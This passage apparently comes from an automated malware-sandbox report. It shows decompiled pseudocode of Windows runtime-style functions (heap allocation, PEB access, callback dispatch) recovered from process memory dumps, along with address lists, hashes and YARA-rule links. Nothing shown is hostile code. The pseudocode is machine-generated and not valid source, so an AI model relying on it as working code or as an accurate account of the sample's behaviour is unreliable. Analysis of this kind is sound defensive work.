					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                                            0x04d14a2c
                                                                                            0x04d14a34
                                                                                            0x04d14a3c
                                                                                            0x04d14a3e
                                                                                            0x04d14a48
                                                                                            0x04d14a4b
                                                                                            0x04d14a4d
                                                                                            0x04d14a51
                                                                                            0x04d14a9c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d14aa3
                                                                                            0x04d14aa8
                                                                                            0x04d14aad
                                                                                            0x04d14ab1
                                                                                            0x04d14ade
                                                                                            0x04d14ae3
                                                                                            0x04d14a5a
                                                                                            0x04d14a62
                                                                                            0x04d14a6a
                                                                                            0x04d14a6e
                                                                                            0x04d4f203
                                                                                            0x04d14a84
                                                                                            0x04d14a88
                                                                                            0x04d14a89
                                                                                            0x04d14a8a
                                                                                            0x04d14a95
                                                                                            0x04d14a95
                                                                                            0x04d14a79
                                                                                            0x04d14a80
                                                                                            0x04d14af2
                                                                                            0x04d14af4
                                                                                            0x04d14af9
                                                                                            0x04d14aff
                                                                                            0x04d14b01
                                                                                            0x04d14b03
                                                                                            0x04d14b08
                                                                                            0x04d4f20a
                                                                                            0x04d4f212
                                                                                            0x04d4f216
                                                                                            0x04d4f216
                                                                                            0x04d14b08
                                                                                            0x04d14b13
                                                                                            0x04d14b1a
                                                                                            0x04d4f229
                                                                                            0x04d4f229
                                                                                            0x04d14b1a
                                                                                            0x04d14a82
                                                                                            0x00000000
                                                                                            0x04d14a82
                                                                                            0x04d14ab7
                                                                                            0x04d14acd
                                                                                            0x04d14acd
                                                                                            0x04d14ad5
                                                                                            0x04d14ada
                                                                                            0x00000000
                                                                                            0x04d14ada
                                                                                            0x04d14ac2
                                                                                            0x04d14acb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d14acb
                                                                                            0x04d14a53
                                                                                            0x04d14a53
                                                                                            0x04d14a58
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4cc784ac0e5286c0faa970b310c2ab0d5bab962a9f1c2b021c6ac9a57b9fd49d
                                                                                            • Instruction ID: be48b73ecd3b1b429f2df9406cd208d1ee67a6ca1fde26bb95c2593a333d1562
                                                                                            • Opcode Fuzzy Hash: 4cc784ac0e5286c0faa970b310c2ab0d5bab962a9f1c2b021c6ac9a57b9fd49d
                                                                                            • Instruction Fuzzy Hash: 43313232341351ABC721AF54D980B2AB7E5FFC1719F02082EE9524B260DB70F804DB89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D0E730, Relevance: .1, Instructions: 89COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 74%
                                                                                            			E04D0E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04D19670() < 0) {
					L04D2DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4dc7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04CF4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M04D0E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                                            0x04d0e730
                                                                                            0x04d0e736
                                                                                            0x04d0e738
                                                                                            0x04d0e73d
                                                                                            0x04d0e73e
                                                                                            0x04d0e740
                                                                                            0x04d0e749
                                                                                            0x04d0e765
                                                                                            0x04d0e76a
                                                                                            0x04d0e76b
                                                                                            0x04d0e76c
                                                                                            0x04d0e76d
                                                                                            0x04d0e76e
                                                                                            0x04d0e76f
                                                                                            0x04d0e775
                                                                                            0x04d0e777
                                                                                            0x04d0e77e
                                                                                            0x04d4b675
                                                                                            0x04d0e784
                                                                                            0x04d0e784
                                                                                            0x04d0e789
                                                                                            0x04d0e7a8
                                                                                            0x04d0e7ac
                                                                                            0x04d0e807
                                                                                            0x04d0e7ae
                                                                                            0x04d0e7ae
                                                                                            0x04d0e7b1
                                                                                            0x04d0e7b4
                                                                                            0x04d0e7b9
                                                                                            0x04d0e7c0
                                                                                            0x04d0e7c4
                                                                                            0x04d0e7ca
                                                                                            0x04d0e7cc
                                                                                            0x00000000
                                                                                            0x04d0e7d3
                                                                                            0x04d0e7d6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0e7ff
                                                                                            0x04d0e802
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0e7f9
                                                                                            0x04d0e7fc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0e7f3
                                                                                            0x04d0e7f6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0e7ed
                                                                                            0x04d0e7f0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0e7e7
                                                                                            0x04d0e7ea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d4b685
                                                                                            0x04d4b688
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d4b682
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0e7cc
                                                                                            0x04d0e7d9
                                                                                            0x04d0e7dc
                                                                                            0x04d0e7de
                                                                                            0x04d0e7de
                                                                                            0x04d0e7ac
                                                                                            0x04d0e7e4
                                                                                            0x04d0e74b
                                                                                            0x04d0e751
                                                                                            0x04d0e759
                                                                                            0x04d0e761
                                                                                            0x04d0e761

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c27c9f8391664f752805e0207aec41be038d4f7d7a4ad278f966334b2c63cfc5
                                                                                            • Instruction ID: d22fa99fd63a717b680db59ebcf1ca04645a1ed4d6fb2700cb9ae9ccd91a1f36
                                                                                            • Opcode Fuzzy Hash: c27c9f8391664f752805e0207aec41be038d4f7d7a4ad278f966334b2c63cfc5
                                                                                            • Instruction Fuzzy Hash: 8E318D75A14249EFD744CF18D840B9AB7E8FB58314F148696F904CB381E631FD80CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D0BC2C, Relevance: .1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 67%
                                                                                            			E04D0BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4dc6100; // 0x42
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04CF2280(0xd, 0x184df1a0);
				_t41 =  *0x4dc60f8; // 0x0
				if(_t41 != 0) {
					 *0x4dc60f8 =  *_t41;
					 *0x4dc60fc =  *0x4dc60fc + 0xffff;
				}
				E04CEFFB0(_t41, 0x800, 0x184df1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x4dc60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04CF4620(0x4dc6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4dc6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                                            0x04d0bc36
                                                                                            0x04d0bc42
                                                                                            0x04d0bc45
                                                                                            0x04d0bc4a
                                                                                            0x04d0bd35
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0bc50
                                                                                            0x04d0bc50
                                                                                            0x04d0bc58
                                                                                            0x04d0bc5a
                                                                                            0x04d0bc60
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d4a4f2
                                                                                            0x04d4a4f6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d4a4fc
                                                                                            0x04d0bc79
                                                                                            0x04d0bc7e
                                                                                            0x04d0bc86
                                                                                            0x04d0bd16
                                                                                            0x04d0bd20
                                                                                            0x04d0bd20
                                                                                            0x04d0bc8d
                                                                                            0x04d0bc94
                                                                                            0x04d0bcbd
                                                                                            0x04d0bcca
                                                                                            0x04d0bccb
                                                                                            0x04d0bccc
                                                                                            0x04d0bccd
                                                                                            0x04d0bcce
                                                                                            0x04d0bcd4
                                                                                            0x04d0bcea
                                                                                            0x04d0bcee
                                                                                            0x04d0bcf2
                                                                                            0x04d0bd00
                                                                                            0x04d0bd04
                                                                                            0x00000000
                                                                                            0x04d0bc96
                                                                                            0x04d0bcab
                                                                                            0x04d0bcaf
                                                                                            0x04d0bd2c
                                                                                            0x04d0bd2c
                                                                                            0x04d0bd09
                                                                                            0x00000000
                                                                                            0x04d0bd09
                                                                                            0x04d0bcb1
                                                                                            0x04d0bcb5
                                                                                            0x04d0bcbb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0bcbb

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5fb0ec69c50ea8db48b675cda90a0f21735625af2a43508acb838f3aba536cb1
                                                                                            • Instruction ID: 7acd44e24d45e3ac9a99ea7840a64b68c7e15f4e886bbaf4b746a13b5cf1dc86
                                                                                            • Opcode Fuzzy Hash: 5fb0ec69c50ea8db48b675cda90a0f21735625af2a43508acb838f3aba536cb1
                                                                                            • Instruction Fuzzy Hash: D73101326046069FDB11DFA8D4807AAB3B4FB18311F00807AED49EB381E738FD059B90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D01DB5, Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 60%
                                                                                            			E04D01DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E04CFF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04CF4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E04CFF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                                            0x04d01dc2
                                                                                            0x04d01dc5
                                                                                            0x04d01dc7
                                                                                            0x04d01dcc
                                                                                            0x04d01dce
                                                                                            0x04d01dd6
                                                                                            0x04d01ddf
                                                                                            0x04d01de0
                                                                                            0x04d01de1
                                                                                            0x04d01de5
                                                                                            0x04d01de8
                                                                                            0x04d01def
                                                                                            0x04d01df0
                                                                                            0x04d01df6
                                                                                            0x04d01df7
                                                                                            0x04d01dfe
                                                                                            0x04d01e1a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d01e0b
                                                                                            0x04d01e12
                                                                                            0x04d01e12
                                                                                            0x04d01e00
                                                                                            0x04d01e00
                                                                                            0x04d01e05
                                                                                            0x04d01e1e
                                                                                            0x04d01e23
                                                                                            0x04d4570f
                                                                                            0x04d45713
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d45719
                                                                                            0x04d45719
                                                                                            0x04d01e2c
                                                                                            0x04d01e2d
                                                                                            0x04d01e2e
                                                                                            0x04d01e2f
                                                                                            0x04d01e31
                                                                                            0x04d01e32
                                                                                            0x04d01e35
                                                                                            0x04d01e3d
                                                                                            0x04d45723
                                                                                            0x04d4573d
                                                                                            0x04d4573d
                                                                                            0x00000000
                                                                                            0x04d45723
                                                                                            0x04d01e49
                                                                                            0x04d01e4e
                                                                                            0x04d01e4e
                                                                                            0x04d01e09
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                            • Instruction ID: 1dfb4a715d2819e8b74528c7cddcfe204095337fa38669cba45ccd6e4d7f681c
                                                                                            • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                            • Instruction Fuzzy Hash: 9A216072600219AFD721CF59CC80FAEBBB9FF85744F118065E90597250DA35BE41D790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CD9100, Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 76%
                                                                                            			E04CD9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x4daf6e8);
				E04D2D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04DA88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E04D2D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x4dc86c0; // 0xd007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x4dc86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04CF2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E04DA88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E04D1AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x4dcb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x4dc84c0;
										if(_t69 >=  *0x4dc84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04DA9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E04CD922A(_t82);
							_t53 = E04CF7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04DA8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x4dc86c0; // 0xd007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x4dc86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x4dc86bc;
										_t72 = 0x4dc86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04CD9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x4dc86c4;
									_t72 = 0x4dc86c0;
									L18:
									E04D09B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                                            0x04cd9100
                                                                                            0x04cd9100
                                                                                            0x04cd9100
                                                                                            0x04cd9100
                                                                                            0x04cd9102
                                                                                            0x04cd9107
                                                                                            0x04cd910c
                                                                                            0x04cd9110
                                                                                            0x04cd9115
                                                                                            0x04cd9136
                                                                                            0x04cd9143
                                                                                            0x04d337e4
                                                                                            0x04d337e4
                                                                                            0x04cd9149
                                                                                            0x04cd914e
                                                                                            0x04cd914e
                                                                                            0x04cd9117
                                                                                            0x04cd911d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cd911f
                                                                                            0x04cd9125
                                                                                            0x00000000
                                                                                            0x04cd9151
                                                                                            0x04cd9158
                                                                                            0x04cd915d
                                                                                            0x04cd9161
                                                                                            0x04cd9168
                                                                                            0x04d33715
                                                                                            0x00000000
                                                                                            0x04cd916e
                                                                                            0x04cd916e
                                                                                            0x04cd9175
                                                                                            0x04cd9177
                                                                                            0x04cd917e
                                                                                            0x04cd917f
                                                                                            0x04cd9182
                                                                                            0x04cd9182
                                                                                            0x04cd9187
                                                                                            0x04cd9187
                                                                                            0x04cd918a
                                                                                            0x04cd918d
                                                                                            0x04cd918f
                                                                                            0x04cd9192
                                                                                            0x04cd9195
                                                                                            0x04cd9198
                                                                                            0x04cd9198
                                                                                            0x04cd9198
                                                                                            0x04cd919a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d3371f
                                                                                            0x04d33721
                                                                                            0x04d33727
                                                                                            0x04d3372f
                                                                                            0x04d33733
                                                                                            0x04d33735
                                                                                            0x04d33738
                                                                                            0x04d3373b
                                                                                            0x04d3373d
                                                                                            0x04d33740
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d33746
                                                                                            0x04d33749
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d3374f
                                                                                            0x04d33751
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d33757
                                                                                            0x04d33759
                                                                                            0x04d3375c
                                                                                            0x04d3375c
                                                                                            0x04d3375e
                                                                                            0x04d3375e
                                                                                            0x04d33761
                                                                                            0x04d33764
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d33766
                                                                                            0x04d33768
                                                                                            0x04d337a3
                                                                                            0x04d337a3
                                                                                            0x04d337a5
                                                                                            0x04d337a7
                                                                                            0x04d337ad
                                                                                            0x04d337b0
                                                                                            0x04d337b2
                                                                                            0x04d337bc
                                                                                            0x04d337c2
                                                                                            0x04d337c2
                                                                                            0x04d337b2
                                                                                            0x04cd9187
                                                                                            0x04cd9187
                                                                                            0x04cd918a
                                                                                            0x04cd918d
                                                                                            0x04cd918f
                                                                                            0x04cd9192
                                                                                            0x04cd9195
                                                                                            0x00000000
                                                                                            0x04cd9195
                                                                                            0x00000000
                                                                                            0x04cd9187
                                                                                            0x04d3376a
                                                                                            0x04d3376a
                                                                                            0x04d3376c
                                                                                            0x04d3376c
                                                                                            0x04d3376f
                                                                                            0x04d33775
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d33777
                                                                                            0x04d33779
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d33782
                                                                                            0x04d33787
                                                                                            0x04d33789
                                                                                            0x04d33790
                                                                                            0x04d33790
                                                                                            0x04d3378b
                                                                                            0x04d3378b
                                                                                            0x04d3378b
                                                                                            0x04d33792
                                                                                            0x04d33795
                                                                                            0x04d33795
                                                                                            0x04d33798
                                                                                            0x04d33798
                                                                                            0x04d3379b
                                                                                            0x04d3379b
                                                                                            0x04cd91a3
                                                                                            0x04cd91a9
                                                                                            0x04cd91b0
                                                                                            0x04cd91b4
                                                                                            0x04cd91b4
                                                                                            0x04cd91bb
                                                                                            0x04cd91c0
                                                                                            0x04cd91c5
                                                                                            0x04cd91c7
                                                                                            0x04d337da
                                                                                            0x04cd91cd
                                                                                            0x04cd91cd
                                                                                            0x04cd91cd
                                                                                            0x04cd91d2
                                                                                            0x04cd91d5
                                                                                            0x04cd9239
                                                                                            0x04cd9239
                                                                                            0x04cd91d7
                                                                                            0x04cd91db
                                                                                            0x04cd91e1
                                                                                            0x04cd91e7
                                                                                            0x04cd91fd
                                                                                            0x04cd9203
                                                                                            0x04cd921e
                                                                                            0x04cd9223
                                                                                            0x00000000
                                                                                            0x04cd9223
                                                                                            0x04cd9205
                                                                                            0x04cd9208
                                                                                            0x04cd920c
                                                                                            0x04cd9214
                                                                                            0x04cd9214
                                                                                            0x04cd91e9
                                                                                            0x04cd91e9
                                                                                            0x04cd91ee
                                                                                            0x04cd91f3
                                                                                            0x04cd91f3
                                                                                            0x04cd91f3
                                                                                            0x04cd91e7
                                                                                            0x00000000
                                                                                            0x04cd91db
                                                                                            0x04cd9187
                                                                                            0x04cd9168

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 59f70b1b897e539b92d0c3fa0cd6a76852c1c89f8fd0f2a22cdb0aa13c0c1eb7
                                                                                            • Instruction ID: eb347ec31393fb0a87e161dd27a652b81285d09f928b0496ffbd5a17c5b320e9
                                                                                            • Opcode Fuzzy Hash: 59f70b1b897e539b92d0c3fa0cd6a76852c1c89f8fd0f2a22cdb0aa13c0c1eb7
                                                                                            • Instruction Fuzzy Hash: 9F31B0BDA01245DFEB25EF68C588BACBBB2BB48358F188149D60567351C334BA80DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CF0050, Relevance: .1, Instructions: 81COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 53%
                                                                                            			E04CF0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x4dcd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
